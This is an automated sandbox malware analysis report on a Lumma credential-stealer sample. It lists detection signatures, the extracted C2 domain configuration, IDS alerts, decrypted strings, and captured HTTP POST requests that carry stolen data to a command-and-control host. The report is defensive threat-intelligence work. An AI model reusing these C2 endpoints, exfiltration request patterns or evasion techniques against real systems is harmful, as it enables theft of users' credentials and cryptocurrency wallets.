Windows Analysis Report
3LUyRfIoKs.exe

Overview

General Information

Sample name: 3LUyRfIoKs.exe (renamed because original name is a hash value)
Original sample name: e17baab743930b14a8d9a54086f091d6.exe
Analysis ID: 1581617
MD5: e17baab743930b14a8d9a54086f091d6
SHA1: 7eed52a4f370c7dc47ac8e4a7ea04a16fafd5993
SHA256: 315aee541b7f4d32b0fa71932e9227aa3ef1667856d5dc35c97bf1434e2ae31c
Tags: exe, user-abuse_ch
Infos:

Detection

Detected family: LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Detected potential crypto function
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • 3LUyRfIoKs.exe (PID: 5856 cmdline: "C:\Users\user\Desktop\3LUyRfIoKs.exe" MD5: E17BAAB743930B14A8D9A54086F091D6)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["cashfuzysao.buzz", "rebuildeso.buzz", "inherineau.buzz", "appliacnesot.buzz", "prisonyfork.buzz", "hummskitnj.buzz", "mindhandru.buzz", "screwamusresz.buzz", "scentniej.buzz"], "Build id": "PsFKDg--pablo"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
00000000.00000003.2268452542.00000000013F4000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: 3LUyRfIoKs.exe PID: 5856 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
Process Memory Space: 3LUyRfIoKs.exe PID: 5856 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: 3LUyRfIoKs.exe PID: 5856 | JoeSecurity_LummaCStealer | Yara detected LummaC Stealer | Joe Security |
decrypted.memstr | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |

No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-28T09:56:27.833768+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49704 | 23.55.153.106 | 443 | TCP
2024-12-28T09:56:30.264241+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49705 | 104.21.66.86 | 443 | TCP
2024-12-28T09:56:32.278763+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49706 | 104.21.66.86 | 443 | TCP
2024-12-28T09:56:34.845788+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49707 | 104.21.66.86 | 443 | TCP
2024-12-28T09:56:37.157974+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49709 | 104.21.66.86 | 443 | TCP
2024-12-28T09:56:39.507854+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49710 | 104.21.66.86 | 443 | TCP
2024-12-28T09:56:42.555579+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49719 | 104.21.66.86 | 443 | TCP
2024-12-28T09:56:45.440158+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49731 | 104.21.66.86 | 443 | TCP
2024-12-28T09:56:48.868512+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49738 | 104.21.66.86 | 443 | TCP
2024-12-28T09:56:30.996564+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49705 | 104.21.66.86 | 443 | TCP
2024-12-28T09:56:33.056715+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49706 | 104.21.66.86 | 443 | TCP
2024-12-28T09:56:30.996564+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.5 | 49705 | 104.21.66.86 | 443 | TCP
2024-12-28T09:56:33.056715+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.5 | 49706 | 104.21.66.86 | 443 | TCP
2024-12-28T09:56:25.766927+0100 | 2058572 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 64200 | 1.1.1.1 | 53 | UDP
2024-12-28T09:56:25.911826+0100 | 2058576 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 53592 | 1.1.1.1 | 53 | UDP
2024-12-28T09:56:26.054370+0100 | 2058578 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 57910 | 1.1.1.1 | 53 | UDP
2024-12-28T09:56:25.477482+0100 | 2058580 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 64150 | 1.1.1.1 | 53 | UDP
2024-12-28T09:56:24.893279+0100 | 2058582 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 61254 | 1.1.1.1 | 53 | UDP
2024-12-28T09:56:25.050344+0100 | 2058584 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 60754 | 1.1.1.1 | 53 | UDP
2024-12-28T09:56:25.192961+0100 | 2058586 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 57484 | 1.1.1.1 | 53 | UDP
2024-12-28T09:56:25.335802+0100 | 2058588 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 61960 | 1.1.1.1 | 53 | UDP
2024-12-28T09:56:25.618979+0100 | 2058590 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 56657 | 1.1.1.1 | 53 | UDP
2024-12-28T09:56:43.351379+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49719 | 104.21.66.86 | 443 | TCP
2024-12-28T09:56:45.444253+0100 | 2843864 | 1 | A Network Trojan was detected | 192.168.2.5 | 49731 | 104.21.66.86 | 443 | TCP
2024-12-28T09:56:28.598026+0100 | 2858666 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49704 | 23.55.153.106 | 443 | TCP

AV Detection

Source: 3LUyRfIoKs.exe | Avira: detected
Source: https://lev-tolstoi.com/ta | Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com:443/apil | Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/apix | Avira URL Cloud: Label: malware
Source: 3LUyRfIoKs.exe.5856.0.memstrmin | Malware Configuration Extractor: LummaC {"C2 url": ["cashfuzysao.buzz", "rebuildeso.buzz", "inherineau.buzz", "appliacnesot.buzz", "prisonyfork.buzz", "hummskitnj.buzz", "mindhandru.buzz", "screwamusresz.buzz", "scentniej.buzz"], "Build id": "PsFKDg--pablo"}
Source: 3LUyRfIoKs.exe | Virustotal: Detection: 59%
Source: 3LUyRfIoKs.exe | ReversingLabs: Detection: 65%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: 3LUyRfIoKs.exe | Joe Sandbox ML: detected
Source: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: hummskitnj.buzz
Source: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: cashfuzysao.buzz
Source: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: appliacnesot.buzz
Source: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: screwamusresz.buzz
Source: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: inherineau.buzz
Source: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: scentniej.buzz
Source: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: rebuildeso.buzz
Source: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: prisonyfork.buzz
Source: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: mindhandru.buzz
Source: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: - Screen Resoluton:
Source: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: Workgroup: -
Source: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: PsFKDg--pablo
Source: C:\Users\user\Desktop\3LUyRfIoKs.exe | Code function: 0_2_00AB57C0 CryptUnprotectData,0_2_00AB57C0
Source: 3LUyRfIoKs.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49719 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49731 version: TLS 1.2

Networking

Source: Network traffic | Suricata IDS: 2058572 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (appliacnesot .buzz) : 192.168.2.5:64200 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058584 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (prisonyfork .buzz) : 192.168.2.5:60754 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058586 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rebuildeso .buzz) : 192.168.2.5:57484 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058576 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cashfuzysao .buzz) : 192.168.2.5:53592 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058588 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (scentniej .buzz) : 192.168.2.5:61960 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058582 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mindhandru .buzz) : 192.168.2.5:61254 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058578 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (hummskitnj .buzz) : 192.168.2.5:57910 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058590 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (screwamusresz .buzz) : 192.168.2.5:56657 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058580 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (inherineau .buzz) : 192.168.2.5:64150 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49719 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.5:49704 -> 23.55.153.106:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49705 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49706 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49706 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:49731 -> 104.21.66.86:443
Source: Malware configuration extractor | URLs: cashfuzysao.buzz
Source: Malware configuration extractor | URLs: rebuildeso.buzz
Source: Malware configuration extractor | URLs: inherineau.buzz
Source: Malware configuration extractor | URLs: appliacnesot.buzz
Source: Malware configuration extractor | URLs: prisonyfork.buzz
Source: Malware configuration extractor | URLs: hummskitnj.buzz
Source: Malware configuration extractor | URLs: mindhandru.buzz
Source: Malware configuration extractor | URLs: screwamusresz.buzz
Source: Malware configuration extractor | URLs: scentniej.buzz
Source: Joe Sandbox View | IP Address: 104.21.66.86
Source: Joe Sandbox View | IP Address: 23.55.153.106
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49706 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49709 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49710 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49707 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49719 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49704 -> 23.55.153.106:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49731 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49738 -> 104.21.66.86:443
Source: global traffic | HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Host: steamcommunity.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 47
    Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=DXFUN3R3CE
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 12787
    Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=TYYEVX5PB
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 15023
    Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=RLS0B21M9
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 20513
    Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=DXSZON86U9QPW6QDNT
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 1269
    Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=X7RLJH0RQFVBV0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 551089
    Host: lev-tolstoi.com
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2242088171.0000000005A77000.00000004.00000800.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2242105573.0000000005A79000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2242088171.0000000005A77000.00000004.00000800.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2242105573.0000000005A79000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2194298974.0000000005A24000.00000004.00000800.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2194446076.0000000005A24000.00000004.00000800.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2194142584.0000000005A26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2194298974.0000000005A24000.00000004.00000800.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2194446076.0000000005A24000.00000004.00000800.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2194142584.0000000005A26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2194298974.0000000005A24000.00000004.00000800.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2194446076.0000000005A24000.00000004.00000800.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2194142584.0000000005A26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2314703853.00000000013DD000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2192782613.00000000013A5000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2294833870.00000000013A3000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2170149537.00000000013A5000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2269059253.00000000013A3000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2298596766.00000000013DD000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2268524976.00000000013A3000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000002.2350812959.00000000013E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.st
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2170149537.00000000013A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2242105573.0000000005A79000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                Source: 3LUyRfIoKs.exe, 00000000.00000002.2350833617.00000000013F4000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2170149537.00000000013A5000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2339617530.00000000013A3000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2269059253.00000000013A3000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000002.2350224490.00000000013A3000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2268524976.00000000013A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2192782613.00000000013A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/4
                Source: 3LUyRfIoKs.exe, 00000000.00000002.2350224490.0000000001363000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000002.2350224490.00000000013A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2339584796.00000000013F4000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2268452542.00000000013F4000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2294773230.00000000013F4000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2268928606.00000000013F4000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2314703853.00000000013F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apiX
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2294710528.00000000013FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apix
                Source: 3LUyRfIoKs.exe, 00000000.00000002.2350833617.00000000013F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/d
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2339584796.00000000013F4000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2294773230.00000000013F4000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2314703853.00000000013F4000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000002.2350833617.00000000013F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/e
                Source: 3LUyRfIoKs.exe, 00000000.00000002.2350833617.00000000013F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/pi
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2339584796.00000000013F4000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2294773230.00000000013F4000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2314703853.00000000013F4000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000002.2350833617.00000000013F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/ta
                Source: 3LUyRfIoKs.exe, 00000000.00000002.2350224490.0000000001363000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com:443/apil
                Source: 3LUyRfIoKs.exe, 00000000.00000002.2350812959.00000000013E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.s
                Source: 3LUyRfIoKs.exe, 00000000.00000002.2350812959.00000000013E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steamp
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2170149537.00000000013A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2170149537.00000000013A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2170149537.00000000013A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
